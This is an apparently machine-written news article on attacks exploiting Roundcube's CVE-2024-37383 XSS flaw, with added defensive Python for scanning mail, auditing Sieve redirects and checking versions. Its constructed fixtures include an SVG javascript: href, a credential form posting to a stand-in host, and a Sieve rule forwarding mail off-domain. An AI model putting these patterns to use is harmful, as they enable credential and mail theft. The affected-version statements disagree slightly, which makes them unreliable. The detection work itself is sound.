Today's cybersecurity headlines are brought to you by ThreatPerspective


Ethical Hacking News

Hackers Exploit Vulnerability in Roundcube Webmail to Steal Email Credentials




Hackers have exploited a medium-severity stored XSS vulnerability in the Roundcube Webmail client, allowing them to steal email credentials and sensitive data from government entities in the CIS region. The latest version of Roundcube Webmail has already been patched, but users are advised to update immediately to ensure their security.

  • Hackers exploited a medium-severity stored XSS vulnerability in Roundcube Webmail, allowing them to steal email credentials and sensitive data from government entities in the CIS region.
  • The vulnerability is tracked as CVE-2024-37383; Positive Technologies discovered the exploitation in September, but attacks on government organizations had begun in June.
  • The attack used emails with no visible content but only a .DOC attachment containing a hidden payload that injected malicious code into the user's page.
  • The threat actor expects two fields - rcmloginuser and rcmloginpwd - to be filled in, either manually or automatically, which are sent to a remote server at "libcdn[.]org."
  • Attackers use the ManageSieve plugin to exfiltrate messages from the mail server, stealing email credentials and sensitive data.
  • The vulnerability affects earlier versions of Roundcube Webmail, specifically those earlier than 1.5.6 and versions 1.6 to 1.6.6.
  • Users are advised to update their software immediately to ensure their security, as the latest version of Roundcube Webmail has already been patched.



    Hackers have been exploiting a vulnerability in the Roundcube Webmail client, a popular open-source PHP-based solution used by commercial and government entities alike. The attack was discovered by Russian cybersecurity company Positive Technologies in September but had been targeting government organizations in the Commonwealth of Independent States (CIS) region as early as June, leaving many wondering how a seemingly secure system could be breached so easily.

    Roundcube Webmail is often praised for its flexibility and customization options, thanks to the support of plugins that can extend its functionality. However, this very openness has proven to be a double-edged sword in this case. The vulnerability identified as CVE-2024-37383, a medium-severity stored XSS (cross-site scripting) flaw, allows malicious JavaScript code to be executed on the Roundcube page when opening a specially crafted email. This is made possible by improper processing of SVG elements in the email, which bypasses syntax checks and allows malicious code to be injected onto the user's page.

    The attacks used emails with no visible content but only a .DOC attachment, containing a hidden payload that was disguised as a "href" value. According to Positive Technologies, this piece of base64-encoded JavaScript code downloads a decoy document from the mail server to distract the victim while simultaneously injecting an unauthorized login form into the HTML page, requesting messages from the mail server.

    The threat actor expects two fields - rcmloginuser and rcmloginpwd (the user's login and password for the Roundcube client) to be filled in, either manually or automatically. Once filled, this data is sent to a remote server at "libcdn[.]org," which is registered recently and hosted on the Cloudflare infrastructure.
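The two indicators the article describes, a URI scheme smuggled through an SVG attribute and a form carrying the rcmloginuser and rcmloginpwd fields that posts to a host other than the mail server, can both be checked before a message reaches the user. The scanner below is an added example written for this page, not code from Positive Technologies or the Roundcube project. The mail samples, the host names example.test and collector.invalid, and the own_hosts parameter are constructed for the example; the attribute list is a general one and not a description of the specific flaw.

```python
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed test fixture for this example (not a captured attack mail): an HTML
# body carrying an SVG whose href is a javascript: URI, plus a login form that
# names Roundcube's credential fields and posts to an off-host server.
SAMPLE_RAW = b"""From: sender@example.test
To: user@example.test
Subject: constructed sample
Content-Type: text/html; charset=utf-8

<html><body>
<svg><a href="javascript:void(0)"><text>x</text></a></svg>
<form action="https://collector.invalid/login" method="post">
<input name="rcmloginuser"><input name="rcmloginpwd" type="password">
</form>
</body></html>
"""

# A harmless HTML mail with an inline SVG: should produce no findings.
BENIGN_RAW = b"""From: sender@example.test
To: user@example.test
Subject: constructed benign sample
Content-Type: text/html; charset=utf-8

<html><body><p>Hello</p><svg><circle r="4"/></svg></body></html>
"""

SUSPICIOUS_SCHEMES = ("javascript:", "data:", "vbscript:")
# SVG attributes that can carry a URI or an animated attribute value.
URI_ATTRIBUTES = {"href", "xlink:href", "values", "to", "from"}
CREDENTIAL_FIELDS = {"rcmloginuser", "rcmloginpwd"}


class _Scanner(HTMLParser):
    """Collects findings while walking one HTML part."""

    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts = own_hosts
        self.findings = []
        self.svg_depth = 0
        self.form_actions = []  # action URLs of the forms currently open

    def handle_starttag(self, tag, attrs):
        attrs = {name.lower(): (value or "") for name, value in attrs}
        if tag == "svg":
            self.svg_depth += 1
        if self.svg_depth:
            if tag == "script":
                self.findings.append("script element inside svg")
            for name, value in attrs.items():
                if name not in URI_ATTRIBUTES:
                    continue
                # animate-style attributes hold ';'-separated lists; check each entry
                for entry in value.lower().split(";"):
                    entry = "".join(entry.split())  # drop embedded whitespace
                    if entry.startswith(SUSPICIOUS_SCHEMES):
                        scheme = entry.split(":", 1)[0]
                        self.findings.append(f"svg <{tag}> {name} uses {scheme}: URI")
        if tag == "form":
            self.form_actions.append(attrs.get("action", ""))
        if tag == "input" and attrs.get("name", "").lower() in CREDENTIAL_FIELDS:
            action = self.form_actions[-1] if self.form_actions else ""
            host = (urlparse(action).hostname or "").lower()
            if host and host not in self.own_hosts:
                self.findings.append(f"credential field {attrs['name']} in form posting to {host}")
            else:
                self.findings.append(f"credential field {attrs['name']} inside mail body")

    def handle_endtag(self, tag):
        if tag == "svg" and self.svg_depth:
            self.svg_depth -= 1
        if tag == "form" and self.form_actions:
            self.form_actions.pop()


def scan_message(raw_bytes, own_hosts=("mail.example.test",)):
    """Return a list of findings for every text/html part of a raw RFC 5322 message."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        scanner = _Scanner({h.lower() for h in own_hosts})
        scanner.feed(part.get_content())
        scanner.close()
        findings.extend(scanner.findings)
    return findings


if __name__ == "__main__":
    for label, raw in (("sample", SAMPLE_RAW), ("benign", BENIGN_RAW)):
        print(label, scan_message(raw) or "no findings")
```

A login form inside a mail body is a finding on its own, whatever its action: Roundcube's real login page is never delivered as a message. The scheme check is deliberately broad (any href-like or animation-value attribute inside an svg element), which is the right trade-off for a mail gateway rule where a false positive only costs a quarantine review.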

    Furthermore, the attackers use the ManageSieve plugin to exfiltrate messages from the mail server, according to Positive Technologies. This means that not only are email credentials being stolen, but also sensitive data contained within those emails themselves.
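Because ManageSieve lets a mailbox owner install server-side rules, the exfiltration the article describes leaves a trace in the user's Sieve script: a redirect action pointing at an address outside the organisation. The audit below is an added example for this page, not code from Positive Technologies or Roundcube; the script text, the example.test and collector.invalid domains, and the trusted_domains parameter are constructed for it.

```python
import re

# Constructed Sieve script written for this example (not taken from an incident):
# one rule the user wrote, and one that silently copies every message off-domain.
SAMPLE_SIEVE = r"""
require ["fileinto", "copy"];
# user's own rule: file list mail and keep a copy in a second mailbox
if header :contains "subject" "newsletter" {
    fileinto "Lists";
    redirect :copy "backup@example.test";
}
# rule added without the user's knowledge: every message is forwarded out
if true {
    redirect :copy "archive@collector.invalid";
}
"""

# A redirect action: the keyword, optional tagged arguments, one quoted address, ';'.
REDIRECT_RE = re.compile(r'\bredirect\b(?P<args>[^;"]*)"(?P<addr>[^"]+)"\s*;', re.IGNORECASE)


def audit_sieve(script, trusted_domains=("example.test",)):
    """List every redirect action in a Sieve script with its line, target and flags."""
    trusted = {d.lower() for d in trusted_domains}
    # Blank out '#' line comments; newlines are kept so line numbers stay correct.
    code = re.sub(r"#[^\n]*", "", script)
    results = []
    for m in REDIRECT_RE.finditer(code):
        addr = m.group("addr")
        domain = addr.rsplit("@", 1)[-1].lower()
        results.append({
            "line": code.count("\n", 0, m.start()) + 1,
            "address": addr,
            "silent_copy": ":copy" in m.group("args").lower(),
            "external": domain not in trusted,
        })
    return results


def external_redirects(script, trusted_domains=("example.test",)):
    """Only the redirects whose target domain is not one of the trusted domains."""
    return [r for r in audit_sieve(script, trusted_domains) if r["external"]]


if __name__ == "__main__":
    for hit in external_redirects(SAMPLE_SIEVE):
        print(f"line {hit['line']}: redirect to {hit['address']} (silent copy: {hit['silent_copy']})")
```

Run this over every active script on the Sieve server (the sieve plugin stores them per user) and alert on any external redirect, treating `:copy` as the more serious case because the original message still lands in the inbox and the user sees nothing missing. The comment handling covers `#` line comments only; a `/* ... */` block comment containing the word redirect would produce a spurious hit, which is the safe direction to fail in.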

    The vulnerability was identified in earlier versions of Roundcube Webmail, specifically those earlier than 1.5.6 and versions 1.6 to 1.6.6. However, the researchers also noted that these attacks are not limited to just government entities in the CIS region. Given the widespread use of such webmail solutions across various sectors, it is imperative for system administrators to update their software as soon as possible.

    The recommended upgrade is the latest version of Roundcube Webmail, 1.6.9, released on September 1. The vulnerability itself was fixed earlier in the affected branches: 1.5.7 and 1.6.7 were released on May 19.
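An administrator checking an installation against the ranges above needs a version comparison that handles both branches, since 1.5.7 is patched while 1.6.6 is not. The check below is an added example for this page, not a Roundcube tool; its affected ranges are bounded by the fix releases the article names (1.5.7 and 1.6.7). It assumes that Roundcube records its release as a `define('RCMAIL_VERSION', ...)` line in program/include/iniset.php, which should be confirmed against the installation; the iniset text shown is constructed.

```python
import re

# Version boundaries taken from the article: fixes shipped in 1.5.7 and 1.6.7,
# so anything below 1.5.7 (including older branches) and 1.6.0 through 1.6.6
# is treated as affected. Ranges are half-open [low, high).
AFFECTED_RANGES = (
    ((0, 0, 0), (1, 5, 7)),
    ((1, 6, 0), (1, 6, 7)),
)

VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:[-+.].*)?$")

# Assumption for this example: Roundcube's release string lives in
# program/include/iniset.php as define('RCMAIL_VERSION', '...'); verify the
# path against your own installation before relying on it.
VERSION_DEFINE_RE = re.compile(r"define\(\s*'RCMAIL_VERSION'\s*,\s*'([^']+)'\s*\)")

# Constructed stand-in for the define line such a file would contain.
SAMPLE_INISET = "<?php\n// bootstrap\ndefine('RCMAIL_VERSION', '1.6.6');\n"


def parse_version(text):
    """'1.6.6' -> (1, 6, 6); '1.6' -> (1, 6, 0); suffixes like '-rc1' are ignored."""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def is_affected(version):
    """True when the release falls inside one of the affected ranges above."""
    v = parse_version(version)
    return any(low <= v < high for low, high in AFFECTED_RANGES)


def version_from_iniset(php_source):
    """Extract the RCMAIL_VERSION string from the contents of iniset.php, or None."""
    m = VERSION_DEFINE_RE.search(php_source)
    return m.group(1) if m else None


def check_install(php_source):
    """Return (version, affected) for an iniset.php body; both None if no version found."""
    version = version_from_iniset(php_source)
    if version is None:
        return (None, None)
    return (version, is_affected(version))


if __name__ == "__main__":
    print(check_install(SAMPLE_INISET))
```

Feeding the function the real file's contents (for example `check_install(open(path).read())`) gives a yes/no answer per host that can be collected across a fleet; a distribution package that backports the fix without changing the version string will show as affected here, so confirm with the package changelog in that case.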

    This isn't the first time Roundcube Webmail has been targeted by hackers due to its open-source nature and widespread use among important organizations. Earlier this year, CISA warned about hackers targeting CVE-2023-43770, another XSS bug in Roundcube, giving federal organizations two weeks to patch.

    In October 2023, Russian hackers known as ‘Winter Vivern’ were observed exploiting a zero-day XSS flaw on Roundcube, tracked as CVE-2023-5631, to breach government entities and think tanks in Europe. And in June 2023, GRU hackers of the APT28 group exploited four Roundcube flaws to steal information from email servers used by multiple organizations in Ukraine, including government agencies.

    This vulnerability, like many others before it, highlights the importance of regular software updates, comprehensive cybersecurity measures, and vigilance against such threats. It serves as a stark reminder that no system is completely secure, and even the most seemingly secure webmail solutions can be vulnerable to exploitation by determined threat actors.

    In light of this recent discovery, users of Roundcube Webmail are advised to update their software immediately to ensure their email credentials and sensitive data remain safe from such malicious activities. System administrators should also prioritize patching these vulnerabilities as soon as possible.






    Related Information:

  • https://www.bleepingcomputer.com/news/security/hackers-exploit-roundcube-webmail-flaw-to-steal-email-credentials/

  • https://nvd.nist.gov/vuln/detail/CVE-2024-37383

  • https://www.cvedetails.com/cve/CVE-2024-37383/

  • https://nvd.nist.gov/vuln/detail/CVE-2023-43770

  • https://www.cvedetails.com/cve/CVE-2023-43770/

  • https://nvd.nist.gov/vuln/detail/CVE-2023-5631

  • https://www.cvedetails.com/cve/CVE-2023-5631/


  • Published: Mon Oct 21 19:10:36 2024 by llama3.2 3B Q4_K_M



    © Ethical Hacking News. All rights reserved.